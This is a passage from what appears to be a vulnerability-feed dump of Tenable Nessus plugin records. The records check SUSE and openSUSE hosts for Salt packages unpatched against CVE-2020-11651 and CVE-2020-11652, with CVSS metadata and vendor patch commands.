script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:saltstack:salt\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"saltstack_salt_linux_installed.nbin\");\n script_require_keys(\"installed_sw/SaltStack Salt Master\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'SaltStack Salt Master');\n\nvcf::check_all_backporting(app_info:app_info);\n\nconstraints = [\n { 'fixed_version' : '2019.2.0', 'fixed_display' : '2019.2.4, 3000.2 or later.' },\n { 'min_version' : '2019.2.0', 'fixed_version' : '2019.2.4' },\n { 'min_version' : '3000.0', 'fixed_version' : '3000.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:27", "description": "This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : salt (openSUSE-2020-564)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:python3-salt", "p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-564.NASL", "href": "https://www.tenable.com/plugins/nessus/136306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136306);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-564)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-2019.2.0-lp151.5.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:10:08", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1151-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1151-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136170);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201151-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6df3c979\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1151=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-2019.2.0-5.67.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:10:09", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1150-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136169", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1150-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136169);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201150-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?85e05fec\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Server-Applications-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Python2-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-SP1-2020-1150=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n 